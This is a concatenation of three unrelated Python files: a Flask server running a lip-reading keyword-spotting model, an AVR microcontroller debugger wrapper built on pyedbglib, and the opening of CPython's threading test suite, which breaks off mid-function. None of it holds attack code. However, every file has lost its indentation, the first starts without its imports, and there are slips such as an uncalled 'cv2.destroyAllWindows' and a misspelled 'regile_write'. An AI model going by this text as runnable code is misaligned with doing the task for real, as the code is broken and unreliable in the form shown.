import copy
import queue
app = Flask(__name__)
args = argparse.ArgumentParser()
config = ConfigParser(args)
model = config.init('arch', module_arch)
logger = config.get_logger('test')
tic = time.time()
with open(os.path.join('./misc/pretrained_models', 'KWS_Net.pth'), 'rb') as f:
checkpoint = torch.load(f)
state_dict = canonical_state_dict_keys(checkpoint['state_dict'])
model.load_state_dict(state_dict)
logger.info(f"Finished loading ckpt in {time.time() - tic:.3f}s")
logger.info(f"CUDA device count: {torch.cuda.device_count()}")
device_count = torch.cuda.device_count()
models = []
for device_ind in range(device_count):
device = f"cuda:{device_ind}"
models.append(copy.deepcopy(model).to(device))
models[device_ind].eval()
from config import load_args
configdl = load_args()
graph_dict = {
'train': TransformerTrainGraph,
'infer': TransformerInferenceGraph,
}
def init_models_and_data(istrain):
print ('Loading data generators')
val_gen, val_epoch_size = setup_generators()
os.environ["CUDA_VISIBLE_DEVICES"] = str(configdl.gpu_id)
gpu_options = tf.GPUOptions(allow_growth=True)
sess_config = tf.ConfigProto(gpu_options=gpu_options)
sess = tf.Session(config=sess_config)
if configdl.lm_path:
# initialize singleton rnn so that RNN tf graph is created first
beam_batch_size = 1
lm_handle = CharRnnLmWrapperSingleton(batch_size=beam_batch_size,
sess=sess,
checkpoint_path=configdl.lm_path)
TransformerGraphClass = graph_dict[configdl.graph_type]
(shapes_in, dtypes_in), (shapes_out, dtypes_out) = \
TransformerGraphClass.get_model_input_target_shapes_and_types()
go_idx = val_gen.label_vectorizer.char_indices[val_gen.label_vectorizer.go_token]
x_val = tf.placeholder(dtypes_in[0], shape=shapes_in[0])
prev_shape = list(shapes_out[0])
if configdl.test_aug_times : prev_shape[0] *= configdl.test_aug_times
prev_ph = tf.placeholder(dtypes_out[0], shape=prev_shape)
y_ph = tf.placeholder(dtypes_out[0], shape=shapes_out[0])
y_val = [prev_ph, y_ph]
chars = val_gen.label_vectorizer.chars
val_g = TransformerGraphClass(x_val,
y_val,
is_training=False,
reuse=tf.AUTO_REUSE,
go_token_index=go_idx,
chars=chars)
print("Validation Graph loaded")
sess.run(tf.tables_initializer())
load_checkpoints(sess)
return val_g, val_epoch_size, chars, sess, val_gen
def load_checkpoints(sess, var_scopes = ('encoder', 'decoder', 'dense')):
checkpoint_path = configdl.lip_model_path
if checkpoint_path:
if os.path.isdir(checkpoint_path):
checkpoint = tf.train.latest_checkpoint(checkpoint_path)
else:
checkpoint = checkpoint_path
if configdl.featurizer:
if checkpoint_path:
from tensorflow.contrib.framework.python.framework import checkpoint_utils
var_list = checkpoint_utils.list_variables(checkpoint)
for var in var_list:
if 'visual_frontend' in var[0]:
var_scopes = var_scopes + ('visual_frontend',)
break
if not 'visual_frontend' in var_scopes:
featurizer_vars = tf.global_variables(scope='visual_frontend')
featurizer_ckpt = tf.train.get_checkpoint_state(configdl.featurizer_model_path)
featurizer_vars = [var for var in featurizer_vars if not 'Adam' in var.name]
tf.train.Saver(featurizer_vars).restore(sess, featurizer_ckpt.model_checkpoint_path)
all_variables = []
for scope in var_scopes:
all_variables += [var for var in tf.global_variables(scope=scope)
if not 'Adam' in var.name ]
if checkpoint_path:
tf.train.Saver(all_variables).restore(sess, checkpoint)
print("Restored saved model {}!".format(checkpoint))
def setup_generators(verbose=False):
val_gen = ListGenerator(data_list=configdl.data_list)
val_epoch_size = val_gen.calc_nbatches_per_epoch()
return val_gen, val_epoch_size
tic = time.time()
np.random.seed(configdl.seed)
tf.set_random_seed(configdl.seed)
val_g, val_epoch_size, chars, sess, val_gen = init_models_and_data(istrain=0)
logger.info(f"Finished initializing Deep Lip Reading model in {time.time() - tic:.3f}s")
# https://pytorch.org/tutorials/intermediate/flask_rest_api_tutorial.html
@app.route('/predict', methods=['GET', 'POST'])
def predict():
print("Lipspeak: Posted file: {}".format(request.files['file']))
tic = time.time()
file = request.files['file']
file.save('media/lipspeak/raw_videos/demo.mp4')
#print("Lipspeak: File saved at: 'media/lipspeak/raw_videos/demo.mp4'")
logger.info(f"Finished saving raw video in {time.time() - tic:.3f}s")
#https://stackoverflow.com/questions/47679227/using-python-to-send-json-and-files-to-flask
tic = time.time()
print("Processing Phrasebook")
queries = json.loads(request.form['phrasebook'])
with open('data/vocab/lipspeak/testphrases.json') as json_file:
phrases = json.load(json_file)
testdict = {}
for key, value in queries.items():
for x in value:
x = x.strip()
testdict[x] = phrases[x]
with open('data/vocab/lipspeak/test_phrases.json', 'w') as fp:
json.dump(testdict, fp)
CMUwords1, phonemes1 = get_CMU_words("data/vocab/cmudict.dict")
with open('data/vocab/lipspeak/test_phrases.json') as f:
test_cases = json.load(f)
dict_lines = []
for full_phrase in test_cases:
for phrase_type in test_cases[full_phrase]:
for test_phrase in test_cases[full_phrase][phrase_type]:
test_phonemes = []
for word in test_phrase.split(" "):
test_phonemes.append(" ".join(phonemes1[CMUwords1.index(word)]).replace("\n",""))
dict_lines.append(test_phrase.replace("_", "") + " " + " ".join(test_phonemes) + "\n")
with open("data/vocab/lipspeak/testdict.dict", "w") as f:
f.writelines(dict_lines)
logger.info(f"Finished processing phrasebook in {time.time() - tic:.3f}s")
tic = time.time()
print("Lipspeak: Resizing video")
video_alignment_resizing()
logger.info(f"Finished resizing video in {time.time() - tic:.3f}s")
tic = time.time()
print("Lipspeak: setup generator for deep lip read")
val_gen, val_epoch_size = setup_generators()
logger.info(f"Finished setup generator in {time.time() - tic:.3f}s")
print("Lipspeak: Extracting features")
tic = time.time()
evaluate_model(val_g, val_epoch_size, chars, sess, val_gen)
logger.info(f"Finished extracting features in {time.time() - tic:.3f}s")
print("Lipspeak: Predict using KWS")
tic = time.time()
kws_prediction = evaluation(config)
logger.info(f"Finished evaluating KWS model in {time.time() - tic:.3f}s")
return jsonify({'index': int(kws_prediction)})
def collate_fn(batch):
if True:
return batch
return default_collate(batch)
def transform_batch_test(lstV_widx_sent, batchword, config):
target = []
lens = []
vnames = []
vidx = []
view = []
batch_size = len(lstV_widx_sent)
start_times = []
end_times = []
lstV_widx_sent_real = []
for k in range(0,batch_size):
if lstV_widx_sent[k][0].size(0)>1:
lstV_widx_sent_real.append(lstV_widx_sent[k])
batch_size = len(lstV_widx_sent_real)
for k in range(0,batch_size):
lens.append(lstV_widx_sent_real[k][0].size(0))
TN = 1 if any(x == batchword for x in lstV_widx_sent_real[k][1]) else 0
target.append(TN)
if TN == 0:
start_times.append(0)
end_times.append(0)
else:
for i, x in enumerate(lstV_widx_sent_real[k][1]):
if x ==batchword:
start_times.append(lstV_widx_sent_real[k][4][i])
end_times.append(lstV_widx_sent_real[k][5][i])
vnames.append(lstV_widx_sent_real[k][2])
view.append(lstV_widx_sent_real[k][3])
lens = np.asarray(lens)
target = np.asarray(target)
start_times = np.asarray(start_times)
end_times=np.asarray(end_times)
Ilens = np.argsort(-lens)
lens = lens[Ilens]
target = target[Ilens]
start_times = start_times[Ilens]
end_times = end_times[Ilens]
vnames = [vnames[i] for i in Ilens]
view = [view[i] for i in Ilens]
max_len = lens[0]
max_out_len,rec_field, offset = in2out_idx(max_len)
batchV = np.zeros((batch_size,max_len,lstV_widx_sent_real[0][0].size(1))).astype('float')
for i in range(0, batch_size):
batchV[i,:lens[i],:] = lstV_widx_sent_real[Ilens[i]][0].clone()
return batchV, lens, target, vnames, view, start_times, end_times, rec_field, Ilens
def in2out_idx(idx_in):
layers = [
{ 'type': 'conv3d', 'n_channels': 32, 'kernel_size': (1,5,5), 'stride': (1,2,2), 'padding': (0,2,2) ,
'maxpool': {'kernel_size' : (1,2,2), 'stride': (1,2,2)} },
{ 'type': 'conv3d', 'n_channels': 64, 'kernel_size': (1,5,5), 'stride': (1,2,2), 'padding': (0,2,2),
'maxpool': {'kernel_size' : (1,2,2), 'stride': (1,2,2)}
},
]
layer_names = None
from misc.compute_receptive_field import calc_receptive_field
idx_out, _, rec_field, offset = calc_receptive_field(layers, idx_in, layer_names)
return idx_out, rec_field, offset
def evaluation(config, logger=None):
def infer_batch(batch_output, widx_list, config, device_ind, queue, model):
logger.info(f"CUDA device context {device_ind}")
with torch.cuda.device(device_ind):
input, lens, target, vnames, view, start_times, end_times, rec_field, Ilens = batch_output
batch_size = input.shape[0]
target = torch.from_numpy(target).cuda(non_blocking=True)
input = torch.from_numpy(input).float().cuda(non_blocking=True)
input_var = Variable(input)
target_var = Variable(target.view(-1,1)).float()
grapheme = []
phoneme = []
for w in widx_list:
grapheme.append(test_dataset.get_GP(w)[0])
phoneme.append(test_dataset.get_GP(w)[1])
batchword_str = ''.join(grapheme[0])
graphemeTensor = Variable(test_dataset.grapheme2tensor(grapheme)).cuda()
phonemeTensor = Variable(test_dataset.phoneme2tensor(phoneme)).cuda()
for w in range(len(widx_list)):
for k in range(0,len(target)):
logits = []
padding = math.ceil((rec_field-1)/2)
input_loc = input[k,:,:].unsqueeze(0).cpu().detach().numpy()
input_loc = np.pad(input_loc, ((0,0), (padding,padding), (0,0)), 'constant', constant_values=(0, 0))
for m in range(0,lens[k]):
input_chunck = torch.from_numpy(input_loc).float().cuda(non_blocking=True)[:, 11-11+m:11+12+m, :]
input_var_chunck= Variable(input_chunck)
lens_loc = np.asarray([23])
preds_loc = model(vis_feat_lens=lens_loc,p_lengths=None, phonemes=phonemeTensor[:,w].unsqueeze(1).detach(), graphemes=graphemeTensor[:-1][:,w].unsqueeze(1).detach(), vis_feats=input_var_chunck, use_BE_localiser=use_BE_localiser, epoch=74, config=config)
logits.append(preds_loc["o_logits"][0][1][0].item())
logits = sigmoid(np.array(logits))
queue.put((widx_list[w], logits))
if logger is None:
logger = config.get_logger('test')
device_count = torch.cuda.device_count()
queues = []
for device_ind in range(device_count):
queues.append(queue.Queue())
num_words = config["dataset"]["args"]["num_words"] #135091
num_phoneme_thr = config["dataset"]["args"]["num_phoneme_thr"]
split = config["dataset"]["args"]["split"]
cmu_dict_path = config["dataset"]["args"]["cmu_dict_path"]
data_struct_path = config["dataset"]["args"]["data_struct_path"]
p_field_path = config["dataset"]["args"]["field_vocab_paths"]["phonemes"]
g_field_path = config["dataset"]["args"]["field_vocab_paths"]["graphemes"]
vis_feat_dir = config["dataset"]["args"]["vis_feat_dir"]
batch_size = config["data_loader"]["args"]["batch_size"]
shuffle = config["data_loader"]["args"]["shuffle"]
drop_last = config["data_loader"]["args"]["drop_last"]
pin_memory = config["data_loader"]["args"]["pin_memory"]
num_workers = config["data_loader"]["args"]["num_workers"]
g2p = config["arch"]["args"]["g2p"]
use_BE_localiser = config["arch"]["args"]["rnn2"]
#tic = time.time()
test_dataset = DatasetV(num_words, num_phoneme_thr, cmu_dict_path, vis_feat_dir,split, data_struct_path, p_field_path, g_field_path, False)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, num_workers =
num_workers, pin_memory=pin_memory, shuffle=shuffle, drop_last=drop_last, collate_fn = collate_fn )
#logger.info(f"Finished dataset loading in {time.time() - tic:.3f}s")
#tic = time.time()
Words = []
for i, lstVwidx in enumerate(test_loader):
for b in range(0, len(lstVwidx)):
for w in lstVwidx[b][1]:
if w != -1:
Words.append(w)
Words = np.unique(np.asarray(Words).astype('int32')).tolist()
#end = time.time()
labels = []
scores = []
original_labels = []
names = []
query_words,_ = get_CMU_words(cmu_dict_path)
results = [None] * len(Words)
logger.info(f"Start Inference:")
#tic = time.time()
batchword = 0
for i, lstVwidx in enumerate(test_loader):
batch_output = transform_batch_test(lstVwidx, batchword, config)
word_intervals = [len(Words)//device_count] * device_count
remainder = len(Words) % device_count
for i in range(remainder):
word_intervals[i] += 1
start_pos = 0
for i in range(len(word_intervals)):
end_pos = start_pos + word_intervals[i]
word_intervals[i] = (start_pos, end_pos)
start_pos = end_pos
print(word_intervals)
threads = []
for i in range(len(word_intervals)):
threads.append(threading.Thread(target=infer_batch, args=(batch_output, Words[word_intervals[i][0]:word_intervals[i][1]], config, i%device_count, queues[i%device_count], models[i%device_count],)))
for i in range(len(word_intervals)):
threads[i].start()
for i in range(len(word_intervals)):
threads[i].join()
for i in range(len(word_intervals)):
while not queues[i].empty():
j, logits = queues[i].get()
results[j] = logits
#logger.info(f"Finished Inference: time spent {round(time.time()-tic,3)}")
#####EH inferece_code_block#####
prob_threshold = 0.3
results = np.stack(results, axis=0)
probs = np.sum((results-prob_threshold).clip(0,1), axis = 1)
if np.sum(probs) == 0:
pred = -1
else:
pred = np.argmax(probs)
print(f"Prediction is {pred}, which is {'unknown' if pred == -1 else query_words[pred]}")
#logger.info(f"Finished KWS in {time.time() - tic:.3f}s")
return pred
#####EH inferece_code_block#####
def video_alignment_resizing():
output_video_dir = "media/lipspeak"
raw_video_dir = os.path.join(output_video_dir, "raw_videos")
fourcc = cv2.VideoWriter_fourcc(*'MP4V')
for video_name in os.listdir(raw_video_dir):
if video_name[-4:].lower() not in [".mp4", ".mov"]: continue
input_video_path = os.path.join(raw_video_dir, video_name)
video_stream = cv2.VideoCapture(input_video_path)
output_video_path = os.path.join(output_video_dir, video_name[:video_name.find(".")]+".mp4")
out = cv2.VideoWriter(output_video_path, fourcc, 30.0, (160,160))
while 1:
still_reading, frame = video_stream.read()
out.write(frame)
if not still_reading:
video_stream.release()
break
try:
processed_frame = frame[210:572, 55:417]
processed_frame = cv2.resize(processed_frame, (160, 160))
out.write(processed_frame)
except Exception as e:
print("DEBUG: resize error", str(e))
print(f"Saved file at: {output_video_path}")
out.release()
cv2.destroyAllWindows
def evaluate_model(val_g, val_epoch_size, chars, sess, val_gen):
np.random.seed(configdl.seed)
tf.set_random_seed(configdl.seed)
tb_writer = None
if configdl.tb_eval:
import shutil
try: shutil.rmtree('eval_tb_logs')
except: pass
tb_logdir = os.path.join(os.getcwd(), 'eval_tb_logs' , 'val')
tb_writer = tf.summary.FileWriter(tb_logdir, sess.graph)
with sess.as_default():
for _ in range(configdl.n_eval_times):
validation_loop(sess, val_g,
val_epoch_size,
chars = chars,
val_gen = val_gen,
tb_writer = tb_writer,
)
print("Done")
def validation_loop(sess, g, n_batches, chars=None, val_gen = None, tb_writer=None):
Loss = []
Cer = []
Wer = []
progbar = Progbar(target=n_batches, verbose=1, stateful_metrics=['t'])
print ('Starting validation Loop')
feature_dir = configdl.feat_output_dir
v_names = write_query_file(feature_dir)
feature_dir = os.path.join(feature_dir, "features")
os.makedirs(feature_dir, exist_ok = False)
video_frame_count = {}
for i in range(n_batches):
x, y = val_gen.next()
if len(x) == 1: x = x[0]
if len(y) == 1: y = y[0]
# -- Autoregressive inference
preds = np.zeros((configdl.batch_size, configdl.maxlen), np.int32)
tile_preds = configdl.test_aug_times
# -- For train graph feed in the previous step's predictions manually for the next
if not 'infer' in configdl.graph_type:
prev_inp = np.tile(preds, [configdl.test_aug_times,1]) if tile_preds else preds
feed_dict = {g.x: x, g.prev: prev_inp, g.y: y}
#####EH Add code block for testing and multiple videos and saving results#####
features_to_extract = sess.run( g.feats, feed_dict)
features_to_extract = features_to_extract[0, :, :]
file_path = os.path.join(feature_dir, f"{v_names[i]}.npy")
with open(file_path, 'wb') as f:
np.save(f, features_to_extract)
print("feature output file created at", file_path)
#####EH End of the added code block Erik Hou#####
###EH End of code added by Erik to extract video length###
def get_CMU_words(CMU_path):
words = []
phonemes = []
with open(CMU_path) as f:
lines = f.readlines()
for wcnt, line in enumerate(lines):
grapheme, phoneme = line.split(" ",1)
words.append(grapheme)
phonemes.append(phoneme.split(" "))
return words, phonemes
def get_video_names(data_struct_path, split):
with open(data_struct_path) as f:
test_cases = json.load(f)[split]
return [test_case["fn"] for test_case in test_cases]
def write_query_file(feature_dir):
if os.path.isdir(feature_dir):
shutil.rmtree(feature_dir, ignore_errors = False)
os.makedirs(feature_dir, exist_ok = True)
CMUwords,_ = get_CMU_words(configdl.dict_file)
if configdl.query_type == "word":
with open(configdl.data_list) as f:
lines = f.readlines()
v_names = []
Dsplitsdemo = {"test":[]}
for line in lines:
v_name, text = line.split(",", 1)
v_names.append(v_name)
test_words = text.strip().replace(",", "").replace("\n", "").lower().split(" ")
test_word_indices = []
print(text, test_words)
for test_word in test_words:
try:
test_word_ind = CMUwords.index(test_word)
except ValueError:
test_word_ind = -1
test_word_indices.append(test_word_ind)
test_words_len = len(test_word_indices)
Dsplitsdemo["test"].append({
"end_word": [0] * test_words_len,
"start_word": [0] * test_words_len,
"widx": test_word_indices,
"fn": v_name[:-4]})
elif configdl.query_type == "phrase":
with open(configdl.data_list) as f:
lines = f.readlines()
v_names = []
Dsplitsdemo = {"phrase":[]}
for line in lines:
v_name, text = line.split(",", 1)
v_names.append(v_name)
Dsplitsdemo["phrase"].append({
"end_word": [0] * len(CMUwords),
"start_word": [0] * len(CMUwords),
"widx": [i for i in range(len(CMUwords))],
"fn": v_names[0][:-4]})
for i in range(1, len(v_names)):
Dsplitsdemo["phrase"].append({
"end_word": [],
"start_word": [],
"widx": [],
"fn": v_names[i][:-4]})
else:
print("Error!!!!!, wrong query type")
return
file_path = os.path.join(feature_dir, "Dsplitsdemo.json")
with open(file_path, 'w') as f:
f.write(json.dumps(Dsplitsdemo))
return v_names
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
debugger.py
|
from pyedbglib.hidtransport.hidtransportfactory import hid_transport
from pyedbglib.protocols import housekeepingprotocol
from pyedbglib.protocols import housekeepingprotocol
from pyedbglib.protocols import avr8protocol
from pyedbglib.protocols import avr8protocolerrors
# Retrieve device info
from pymcuprog.deviceinfo import deviceinfo
# Construct an NVM provider
from pymcuprog.nvmupdi import NvmAccessProviderCmsisDapUpdi
from pyedbglib.protocols.avrcmsisdap import AvrCommand, AvrCommandError
from pyedbglib.protocols.jtagice3protocol import Jtagice3Command
import logging
import threading
import time
import asyncio
logging.basicConfig(level=logging.INFO,handlers=[logging.StreamHandler()])
class Debugger():
def __init__(self, DeviceName):
# Make a connection
self.transport = hid_transport()
self.transport.disconnect()
# Connect
self.transport.connect()
self.deviceInf = deviceinfo.getdeviceinfo(DeviceName)
self.memoryinfo = deviceinfo.DeviceMemoryInfo(self.deviceInf)
self.housekeeper = housekeepingprotocol.Jtagice3HousekeepingProtocol(self.transport)
self.housekeeper.start_session()
self.device = NvmAccessProviderCmsisDapUpdi(self.transport, self.deviceInf)
#self.device.avr.deactivate_physical()
self.device.avr.activate_physical()
# Start debug by attaching (live)
self.device.avr.protocol.attach()
#threading.Thread(target=pollingThread, args=(self.eventReciver,)).start()
def pollEvent(self):
#eventRegister = self.eventReciver.poll_events()
eventRegister = self.device.avr.protocol.poll_events()
#logging.info(eventRegister)
if eventRegister[0] == AvrCommand.AVR_EVENT: # Verifying data is an event
size = int.from_bytes(eventRegister[1:3], byteorder='big')
if size != 0:
#event recived
logging.info("Event recived")
eventarray = eventRegister[3:(size+1+3)]
SOF = eventarray[0]
protocol_version = eventarray[1:2]
sequence_id = eventarray[2:4]
protocol_handler_id = eventarray[4:5]
payload = eventarray[5:]
#logging.info(eventarray)
if payload[0] == avr8protocol.Avr8Protocol.EVT_AVR8_BREAK:
event_id = payload[0]
#event_version = payload[1]
pc = payload[1:5]
break_cause = payload[5]
extended_info = payload[6:]
print("PC: ", end="")
print(int.from_bytes(pc, byteorder='little'))
logging.info("Recived break event")
return (avr8protocol.Avr8Protocol.EVT_AVR8_BREAK, int.from_bytes(pc, byteorder='little'), break_cause)
else:
logging.info("Unknown event: " + payload[0])
return None
else:
logging.info("No event")
return None
# Memory interaction
def writeSRAM(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('internal_sram'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('internal_sram'), address-offset, data)
def readSRAM(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('internal_sram'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('internal_sram'), address-offset, numBytes)
def readFlash(self, address, numBytes):
return self.device.read(self.memoryinfo.memory_info_by_name('flash'), address, numBytes)
def writeEEPROM(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('eeprom'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('eeprom'), address-offset, data)
def readEEPROM(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('eeprom'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('eeprom'), address-offset, numBytes)
def writeFuse(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('fuses'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('fuses'), address-offset, data)
def readFuse(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('fuses'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('fuses'), address-offset, numBytes)
def writeLock(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('lockbits'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('lockbits'), address-offset, data)
def readLock(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('lockbits'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('lockbits'), address-offset, numBytes)
def writeSignature(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('signatures'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('signatures'), address-offset, data)
def readSignature(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('signatures'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('signatures'), address-offset, numBytes)
def writeUserSignature(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('user_row'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('user_row'), address-offset, data)
def readUserSignature(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('user_row'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('user_row'), address-offset, numBytes)
# General debugging
def attach(self, do_break=False):
self.device.avr.protocol.attach(do_break)
def detach(self):
self.device.avr.protocol.detach()
# Flow controll
def reset(self):
self.device.avr.protocol.reset()
def step(self):
self.device.avr.protocol.step()
def stop(self):
self.device.avr.protocol.stop()
def run(self):
self.device.avr.protocol.run()
def runTo(self, address):
wordAddress = int(address/2)
self.device.avr.protocol.run_to(wordAddress)
def readStackPointer(self):
return self.device.avr.stack_pointer_read()
def readSREG(self):
return self.device.avr.protocol.memory_read(avr8protocol.Avr8Protocol.AVR8_MEMTYPE_OCD, 0x1C, 0x01)
def readRunningState(self):
# Debug interface to see what state the avr is in.
AVR8_CTXT_TEST = 0x80
AVR8_TEST_TGT_RUNNING = 0x00
running = bool(self.device.avr.protocol.get_byte(AVR8_CTXT_TEST, AVR8_TEST_TGT_RUNNING))
logging.info("AVR running state " + str(running))
return running
# Register and programcounter
def readRegs(self):
return self.device.avr.protocol.regfile_read()
def writeRegs(self, regs):
return self.device.avr.protocol.regile_write(regs)
def readProgramCounter(self):
# Returned as a word not a byte
return self.device.avr.protocol.program_counter_read()
def writeProgramCounter(self, programCounter):
self.device.avr.protocol.program_counter_write(programCounter)
# SoftwareBreakpoints EDBG expects these addresses in bytes
# Multiple SW breakpoints can be defined by shifting 4 bytes to the left
def breakpointSWSet(self, address):
self.device.avr.protocol.software_breakpoint_set(address)
def breakpointSWClear(self, address):
self.device.avr.protocol.software_breakpoint_clear(address)
def breakpointSWClearAll(self):
self.device.avr.protocol.software_breakpoint_clear_all()
# HardwareBreakpoints EDBG expects these addresses in words
def breakpointHWSet(self, address):
wordAddress = int(address/2)
self.device.avr.breakpoint_set(wordAddress)
def breakpointHWClear(self):
self.device.avr.breakpoint_clear()
# Cleanup code for detatching target
def cleanup(self):
# and end debug
self.device.avr.protocol.stop()
self.device.avr.protocol.software_breakpoint_clear_all()
self.device.avr.breakpoint_clear()
self.device.avr.protocol.detach()
# Stop session
#avr.stop()
self.device.avr.deactivate_physical()
# Unwind the stack
self.housekeeper.end_session()
self.transport.disconnect()
def __exit__(self, exc_type, exc_value, traceback):
self.cleanup()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
